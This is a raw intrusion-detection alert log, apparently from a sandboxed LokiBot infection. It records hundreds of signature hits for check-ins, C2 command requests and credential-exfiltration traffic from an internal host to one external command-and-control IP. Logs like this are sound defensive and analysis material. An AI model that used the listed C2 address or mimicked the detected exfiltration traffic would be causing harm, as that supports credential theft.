04/06/24-09:29:47.378472	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49752	80	192.168.2.6	172.67.148.126
04/06/24-09:31:06.999341	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49850	80	192.168.2.6	172.67.148.126
04/06/24-09:30:10.531874	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49778	80	192.168.2.6	172.67.148.126
04/06/24-09:29:55.812911	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49761	80	192.168.2.6	172.67.148.126
04/06/24-09:30:12.096911	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49781	80	192.168.2.6	172.67.148.126
04/06/24-09:30:02.046578	TCP	2025381	ET TROJAN LokiBot Checkin	49769	80	192.168.2.6	172.67.148.126
04/06/24-09:31:10.846749	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49856	80	192.168.2.6	172.67.148.126
04/06/24-09:30:11.314149	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49780	80	192.168.2.6	172.67.148.126
04/06/24-09:31:10.846749	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49856	80	192.168.2.6	172.67.148.126
04/06/24-09:30:31.907019	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49807	80	192.168.2.6	172.67.148.126
04/06/24-09:30:43.503603	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49822	80	192.168.2.6	172.67.148.126
04/06/24-09:30:48.181654	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49828	80	192.168.2.6	172.67.148.126
04/06/24-09:30:36.516498	TCP	2025381	ET TROJAN LokiBot Checkin	49814	80	192.168.2.6	172.67.148.126
04/06/24-09:29:31.298967	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49727	80	192.168.2.6	172.67.148.126
04/06/24-09:30:48.181654	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49828	80	192.168.2.6	172.67.148.126
04/06/24-09:29:27.109787	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49721	80	192.168.2.6	172.67.148.126
04/06/24-09:30:05.891670	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49774	80	192.168.2.6	172.67.148.126
04/06/24-09:30:38.088060	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49816	80	192.168.2.6	172.67.148.126
04/06/24-09:31:03.119856	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49845	80	192.168.2.6	172.67.148.126
04/06/24-09:30:11.314149	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49780	80	192.168.2.6	172.67.148.126
04/06/24-09:29:24.839758	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49718	80	192.168.2.6	172.67.148.126
04/06/24-09:29:54.259588	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49759	80	192.168.2.6	172.67.148.126
04/06/24-09:30:15.972978	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49787	80	192.168.2.6	172.67.148.126
04/06/24-09:30:43.503603	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49822	80	192.168.2.6	172.67.148.126
04/06/24-09:31:05.441892	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49848	80	192.168.2.6	172.67.148.126
04/06/24-09:30:15.205072	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49786	80	192.168.2.6	172.67.148.126
04/06/24-09:30:17.112021	TCP	2025381	ET TROJAN LokiBot Checkin	49788	80	192.168.2.6	172.67.148.126
04/06/24-09:30:04.359604	TCP	2025381	ET TROJAN LokiBot Checkin	49772	80	192.168.2.6	172.67.148.126
04/06/24-09:31:12.357168	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49858	80	192.168.2.6	172.67.148.126
04/06/24-09:31:14.663983	TCP	2025381	ET TROJAN LokiBot Checkin	49861	80	192.168.2.6	172.67.148.126
04/06/24-09:30:15.205072	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49786	80	192.168.2.6	172.67.148.126
04/06/24-09:31:13.897343	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49860	80	192.168.2.6	172.67.148.126
04/06/24-09:29:48.178974	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49753	80	192.168.2.6	172.67.148.126
04/06/24-09:29:24.137227	TCP	2024317	ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2	49717	80	192.168.2.6	172.67.148.126
04/06/24-09:30:31.133120	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49806	80	192.168.2.6	172.67.148.126
04/06/24-09:30:44.269499	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49823	80	192.168.2.6	172.67.148.126
04/06/24-09:30:28.779878	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49803	80	192.168.2.6	172.67.148.126
04/06/24-09:29:24.137227	TCP	2024312	ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1	49717	80	192.168.2.6	172.67.148.126
04/06/24-09:31:13.117986	TCP	2025381	ET TROJAN LokiBot Checkin	49859	80	192.168.2.6	172.67.148.126
04/06/24-09:29:35.705322	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49734	80	192.168.2.6	172.67.148.126
04/06/24-09:30:31.133120	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49806	80	192.168.2.6	172.67.148.126
04/06/24-09:29:26.328739	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49720	80	192.168.2.6	172.67.148.126
04/06/24-09:29:36.488685	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49737	80	192.168.2.6	172.67.148.126
04/06/24-09:30:28.779878	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49803	80	192.168.2.6	172.67.148.126
04/06/24-09:30:08.980641	TCP	2025381	ET TROJAN LokiBot Checkin	49776	80	192.168.2.6	172.67.148.126
04/06/24-09:30:15.972978	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49787	80	192.168.2.6	172.67.148.126
04/06/24-09:30:26.424765	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49800	80	192.168.2.6	172.67.148.126
04/06/24-09:29:26.328739	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49720	80	192.168.2.6	172.67.148.126
04/06/24-09:30:25.641172	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49799	80	192.168.2.6	172.67.148.126
04/06/24-09:30:14.423119	TCP	2025381	ET TROJAN LokiBot Checkin	49785	80	192.168.2.6	172.67.148.126
04/06/24-09:29:38.036927	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49740	80	192.168.2.6	172.67.148.126
04/06/24-09:30:19.440133	TCP	2025381	ET TROJAN LokiBot Checkin	49791	80	192.168.2.6	172.67.148.126
04/06/24-09:30:51.314444	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49832	80	192.168.2.6	172.67.148.126
04/06/24-09:30:25.641172	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49799	80	192.168.2.6	172.67.148.126
04/06/24-09:31:03.891737	TCP	2025381	ET TROJAN LokiBot Checkin	49846	80	192.168.2.6	172.67.148.126
04/06/24-09:31:13.897343	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49860	80	192.168.2.6	172.67.148.126
04/06/24-09:30:18.674487	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49790	80	192.168.2.6	172.67.148.126
04/06/24-09:29:27.906071	TCP	2025381	ET TROJAN LokiBot Checkin	49722	80	192.168.2.6	172.67.148.126
04/06/24-09:30:09.757970	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49777	80	192.168.2.6	172.67.148.126
04/06/24-09:30:29.547586	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49804	80	192.168.2.6	172.67.148.126
04/06/24-09:30:03.603579	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49771	80	192.168.2.6	172.67.148.126
04/06/24-09:30:30.339047	TCP	2025381	ET TROJAN LokiBot Checkin	49805	80	192.168.2.6	172.67.148.126
04/06/24-09:31:24.825007	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49872	80	192.168.2.6	172.67.148.126
04/06/24-09:30:39.686953	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49819	80	192.168.2.6	172.67.148.126
04/06/24-09:30:50.516269	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49831	80	192.168.2.6	172.67.148.126
04/06/24-09:29:52.706701	TCP	2025381	ET TROJAN LokiBot Checkin	49757	80	192.168.2.6	172.67.148.126
04/06/24-09:29:54.259588	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49759	80	192.168.2.6	172.67.148.126
04/06/24-09:30:09.757970	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49777	80	192.168.2.6	172.67.148.126
04/06/24-09:29:24.839758	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49718	80	192.168.2.6	172.67.148.126
04/06/24-09:30:50.516269	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49831	80	192.168.2.6	172.67.148.126
04/06/24-09:29:55.812911	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49761	80	192.168.2.6	172.67.148.126
04/06/24-09:31:07.768549	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49851	80	192.168.2.6	172.67.148.126
04/06/24-09:29:27.109787	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49721	80	192.168.2.6	172.67.148.126
04/06/24-09:29:57.360186	TCP	2025381	ET TROJAN LokiBot Checkin	49763	80	192.168.2.6	172.67.148.126
04/06/24-09:30:39.686953	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49819	80	192.168.2.6	172.67.148.126
04/06/24-09:31:06.999341	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49850	80	192.168.2.6	172.67.148.126
04/06/24-09:29:56.595283	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49762	80	192.168.2.6	172.67.148.126
04/06/24-09:30:18.674487	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49790	80	192.168.2.6	172.67.148.126
04/06/24-09:30:34.204192	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49810	80	192.168.2.6	172.67.148.126
04/06/24-09:30:59.991734	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49841	80	192.168.2.6	172.67.148.126
04/06/24-09:31:02.332845	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49844	80	192.168.2.6	172.67.148.126
04/06/24-09:29:40.344957	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49743	80	192.168.2.6	172.67.148.126
04/06/24-09:30:49.735329	TCP	2025381	ET TROJAN LokiBot Checkin	49830	80	192.168.2.6	172.67.148.126
04/06/24-09:31:10.080334	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49855	80	192.168.2.6	172.67.148.126
04/06/24-09:29:55.035047	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49760	80	192.168.2.6	172.67.148.126
04/06/24-09:29:39.580792	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49742	80	192.168.2.6	172.67.148.126
04/06/24-09:30:20.206304	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49792	80	192.168.2.6	172.67.148.126
04/06/24-09:29:34.079276	TCP	2025381	ET TROJAN LokiBot Checkin	49729	80	192.168.2.6	172.67.148.126
04/06/24-09:31:03.119856	TCP	2025381	ET TROJAN LokiBot Checkin	49845	80	192.168.2.6	172.67.148.126
04/06/24-09:30:47.361321	TCP	2025381	ET TROJAN LokiBot Checkin	49827	80	192.168.2.6	172.67.148.126
04/06/24-09:31:02.332845	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49844	80	192.168.2.6	172.67.148.126
04/06/24-09:29:58.128553	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49764	80	192.168.2.6	172.67.148.126
04/06/24-09:29:58.128553	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49764	80	192.168.2.6	172.67.148.126
04/06/24-09:29:45.799677	TCP	2025381	ET TROJAN LokiBot Checkin	49750	80	192.168.2.6	172.67.148.126
04/06/24-09:29:27.109787	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49721	80	192.168.2.6	172.67.148.126
04/06/24-09:30:12.861151	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49782	80	192.168.2.6	172.67.148.126
04/06/24-09:31:13.117986	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49859	80	192.168.2.6	172.67.148.126
04/06/24-09:29:53.470085	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49758	80	192.168.2.6	172.67.148.126
04/06/24-09:30:08.980641	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49776	80	192.168.2.6	172.67.148.126
04/06/24-09:30:35.733011	TCP	2025381	ET TROJAN LokiBot Checkin	49812	80	192.168.2.6	172.67.148.126
04/06/24-09:31:13.117986	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49859	80	192.168.2.6	172.67.148.126
04/06/24-09:29:27.109787	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49721	80	192.168.2.6	172.67.148.126
04/06/24-09:30:55.220105	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49837	80	192.168.2.6	172.67.148.126
04/06/24-09:31:19.370644	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49865	80	192.168.2.6	172.67.148.126
04/06/24-09:30:02.814837	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49770	80	192.168.2.6	172.67.148.126
04/06/24-09:31:22.429106	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49869	80	192.168.2.6	172.67.148.126
04/06/24-09:30:01.279270	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49768	80	192.168.2.6	172.67.148.126
04/06/24-09:30:12.861151	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49782	80	192.168.2.6	172.67.148.126
04/06/24-09:30:39.686953	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49819	80	192.168.2.6	172.67.148.126
04/06/24-09:31:22.429106	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49869	80	192.168.2.6	172.67.148.126
04/06/24-09:30:38.088060	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49816	80	192.168.2.6	172.67.148.126
04/06/24-09:31:10.080334	TCP	2025381	ET TROJAN LokiBot Checkin	49855	80	192.168.2.6	172.67.148.126
04/06/24-09:29:47.378472	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49752	80	192.168.2.6	172.67.148.126
04/06/24-09:29:29.470677	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49724	80	192.168.2.6	172.67.148.126
04/06/24-09:30:20.970310	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49793	80	192.168.2.6	172.67.148.126
04/06/24-09:30:38.088060	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49816	80	192.168.2.6	172.67.148.126
04/06/24-09:30:15.205072	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49786	80	192.168.2.6	172.67.148.126
04/06/24-09:29:58.921065	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49765	80	192.168.2.6	172.67.148.126
04/06/24-09:30:20.206304	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49792	80	192.168.2.6	172.67.148.126
04/06/24-09:31:04.659572	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49847	80	192.168.2.6	172.67.148.126
04/06/24-09:30:27.986411	TCP	2025381	ET TROJAN LokiBot Checkin	49802	80	192.168.2.6	172.67.148.126
04/06/24-09:29:24.137227	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49717	80	192.168.2.6	172.67.148.126
04/06/24-09:30:00.493399	TCP	2025381	ET TROJAN LokiBot Checkin	49767	80	192.168.2.6	172.67.148.126
04/06/24-09:30:38.861510	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49818	80	192.168.2.6	172.67.148.126
04/06/24-09:29:27.906071	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49722	80	192.168.2.6	172.67.148.126
04/06/24-09:30:11.314149	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49780	80	192.168.2.6	172.67.148.126
04/06/24-09:30:12.096911	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49781	80	192.168.2.6	172.67.148.126
04/06/24-09:31:20.907030	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49867	80	192.168.2.6	172.67.148.126
04/06/24-09:31:20.907030	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49867	80	192.168.2.6	172.67.148.126
04/06/24-09:30:48.957388	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49829	80	192.168.2.6	172.67.148.126
04/06/24-09:30:29.547586	TCP	2025381	ET TROJAN LokiBot Checkin	49804	80	192.168.2.6	172.67.148.126
04/06/24-09:29:46.581121	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49751	80	192.168.2.6	172.67.148.126
04/06/24-09:30:28.779878	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49803	80	192.168.2.6	172.67.148.126
04/06/24-09:30:56.772335	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49839	80	192.168.2.6	172.67.148.126
04/06/24-09:31:11.610579	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49857	80	192.168.2.6	172.67.148.126
04/06/24-09:29:38.799315	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49741	80	192.168.2.6	172.67.148.126
04/06/24-09:30:25.641172	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49799	80	192.168.2.6	172.67.148.126
04/06/24-09:30:23.301208	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49796	80	192.168.2.6	172.67.148.126
04/06/24-09:29:38.799315	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49741	80	192.168.2.6	172.67.148.126
04/06/24-09:30:56.772335	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49839	80	192.168.2.6	172.67.148.126
04/06/24-09:30:38.861510	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49818	80	192.168.2.6	172.67.148.126
04/06/24-09:30:36.516498	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49814	80	192.168.2.6	172.67.148.126
04/06/24-09:31:09.316933	TCP	2025381	ET TROJAN LokiBot Checkin	49853	80	192.168.2.6	172.67.148.126
04/06/24-09:30:19.440133	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49791	80	192.168.2.6	172.67.148.126
04/06/24-09:30:21.735500	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49794	80	192.168.2.6	172.67.148.126
04/06/24-09:30:57.593507	TCP	2025381	ET TROJAN LokiBot Checkin	49840	80	192.168.2.6	172.67.148.126
04/06/24-09:31:21.669304	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49868	80	192.168.2.6	172.67.148.126
04/06/24-09:29:48.178974	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49753	80	192.168.2.6	172.67.148.126
04/06/24-09:29:31.298967	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49727	80	192.168.2.6	172.67.148.126
04/06/24-09:29:51.123133	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49755	80	192.168.2.6	172.67.148.126
04/06/24-09:31:12.357168	TCP	2025381	ET TROJAN LokiBot Checkin	49858	80	192.168.2.6	172.67.148.126
04/06/24-09:30:50.516269	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49831	80	192.168.2.6	172.67.148.126
04/06/24-09:31:24.825007	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49872	80	192.168.2.6	172.67.148.126
04/06/24-09:30:19.440133	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49791	80	192.168.2.6	172.67.148.126
04/06/24-09:29:30.251229	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49725	80	192.168.2.6	172.67.148.126
04/06/24-09:29:38.036927	TCP	2025381	ET TROJAN LokiBot Checkin	49740	80	192.168.2.6	172.67.148.126
04/06/24-09:30:18.674487	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49790	80	192.168.2.6	172.67.148.126
04/06/24-09:30:46.592042	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49826	80	192.168.2.6	172.67.148.126
04/06/24-09:29:37.260471	TCP	2025381	ET TROJAN LokiBot Checkin	49739	80	192.168.2.6	172.67.148.126
04/06/24-09:30:46.592042	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49826	80	192.168.2.6	172.67.148.126
04/06/24-09:30:18.674487	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49790	80	192.168.2.6	172.67.148.126
04/06/24-09:29:59.690030	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49766	80	192.168.2.6	172.67.148.126
04/06/24-09:29:45.799677	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49750	80	192.168.2.6	172.67.148.126
04/06/24-09:30:47.361321	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49827	80	192.168.2.6	172.67.148.126
04/06/24-09:30:22.504191	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49795	80	192.168.2.6	172.67.148.126
04/06/24-09:31:08.547895	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49852	80	192.168.2.6	172.67.148.126
04/06/24-09:30:22.504191	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49795	80	192.168.2.6	172.67.148.126
04/06/24-09:31:21.669304	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49868	80	192.168.2.6	172.67.148.126
04/06/24-09:30:52.865138	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49834	80	192.168.2.6	172.67.148.126
04/06/24-09:30:05.124910	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49773	80	192.168.2.6	172.67.148.126
04/06/24-09:31:15.463121	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49862	80	192.168.2.6	172.67.148.126
04/06/24-09:29:26.328739	TCP	2025381	ET TROJAN LokiBot Checkin	49720	80	192.168.2.6	172.67.148.126
04/06/24-09:30:14.423119	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49785	80	192.168.2.6	172.67.148.126
04/06/24-09:29:41.891260	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49745	80	192.168.2.6	172.67.148.126
04/06/24-09:30:15.972978	TCP	2025381	ET TROJAN LokiBot Checkin	49787	80	192.168.2.6	172.67.148.126
04/06/24-09:29:56.595283	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49762	80	192.168.2.6	172.67.148.126
04/06/24-09:30:14.423119	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49785	80	192.168.2.6	172.67.148.126
04/06/24-09:29:57.360186	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49763	80	192.168.2.6	172.67.148.126
04/06/24-09:29:56.595283	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49762	80	192.168.2.6	172.67.148.126
04/06/24-09:30:52.865138	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49834	80	192.168.2.6	172.67.148.126
04/06/24-09:31:13.897343	TCP	2025381	ET TROJAN LokiBot Checkin	49860	80	192.168.2.6	172.67.148.126
04/06/24-09:30:03.603579	TCP	2025381	ET TROJAN LokiBot Checkin	49771	80	192.168.2.6	172.67.148.126
04/06/24-09:30:51.314444	TCP	2025381	ET TROJAN LokiBot Checkin	49832	80	192.168.2.6	172.67.148.126
04/06/24-09:29:27.906071	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49722	80	192.168.2.6	172.67.148.126
04/06/24-09:29:24.137227	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49717	80	192.168.2.6	172.67.148.126
04/06/24-09:30:44.269499	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49823	80	192.168.2.6	172.67.148.126
04/06/24-09:30:45.801533	TCP	2025381	ET TROJAN LokiBot Checkin	49825	80	192.168.2.6	172.67.148.126
04/06/24-09:29:52.706701	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49757	80	192.168.2.6	172.67.148.126
04/06/24-09:31:08.547895	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49852	80	192.168.2.6	172.67.148.126
04/06/24-09:29:54.259588	TCP	2025381	ET TROJAN LokiBot Checkin	49759	80	192.168.2.6	172.67.148.126
04/06/24-09:31:03.891737	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49846	80	192.168.2.6	172.67.148.126
04/06/24-09:31:05.441892	TCP	2025381	ET TROJAN LokiBot Checkin	49848	80	192.168.2.6	172.67.148.126
04/06/24-09:30:31.133120	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49806	80	192.168.2.6	172.67.148.126
04/06/24-09:29:35.705322	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49734	80	192.168.2.6	172.67.148.126
04/06/24-09:29:24.839758	TCP	2025381	ET TROJAN LokiBot Checkin	49718	80	192.168.2.6	172.67.148.126
04/06/24-09:30:30.339047	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49805	80	192.168.2.6	172.67.148.126
04/06/24-09:30:45.042075	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49824	80	192.168.2.6	172.67.148.126
04/06/24-09:31:20.136720	TCP	2025381	ET TROJAN LokiBot Checkin	49866	80	192.168.2.6	172.67.148.126
04/06/24-09:29:41.891260	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49745	80	192.168.2.6	172.67.148.126
04/06/24-09:31:18.590588	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49864	80	192.168.2.6	172.67.148.126
04/06/24-09:29:35.705322	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49734	80	192.168.2.6	172.67.148.126
04/06/24-09:30:34.975531	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49811	80	192.168.2.6	172.67.148.126
04/06/24-09:31:18.590588	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49864	80	192.168.2.6	172.67.148.126
04/06/24-09:29:52.706701	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49757	80	192.168.2.6	172.67.148.126
04/06/24-09:30:09.757970	TCP	2025381	ET TROJAN LokiBot Checkin	49777	80	192.168.2.6	172.67.148.126
04/06/24-09:30:44.269499	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49823	80	192.168.2.6	172.67.148.126
04/06/24-09:31:03.891737	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49846	80	192.168.2.6	172.67.148.126
04/06/24-09:29:57.360186	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49763	80	192.168.2.6	172.67.148.126
04/06/24-09:30:30.339047	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49805	80	192.168.2.6	172.67.148.126
04/06/24-09:30:04.359604	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49772	80	192.168.2.6	172.67.148.126
04/06/24-09:30:15.205072	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49786	80	192.168.2.6	172.67.148.126
04/06/24-09:30:17.895022	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49789	80	192.168.2.6	172.67.148.126
04/06/24-09:29:55.812911	TCP	2025381	ET TROJAN LokiBot Checkin	49761	80	192.168.2.6	172.67.148.126
04/06/24-09:30:06.739588	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49775	80	192.168.2.6	172.67.148.126
04/06/24-09:30:06.739588	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49775	80	192.168.2.6	172.67.148.126
04/06/24-09:30:31.907019	TCP	2025381	ET TROJAN LokiBot Checkin	49807	80	192.168.2.6	172.67.148.126
04/06/24-09:31:14.663983	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49861	80	192.168.2.6	172.67.148.126
04/06/24-09:31:06.999341	TCP	2025381	ET TROJAN LokiBot Checkin	49850	80	192.168.2.6	172.67.148.126
04/06/24-09:30:42.736556	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49821	80	192.168.2.6	172.67.148.126
04/06/24-09:29:41.115114	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49744	80	192.168.2.6	172.67.148.126
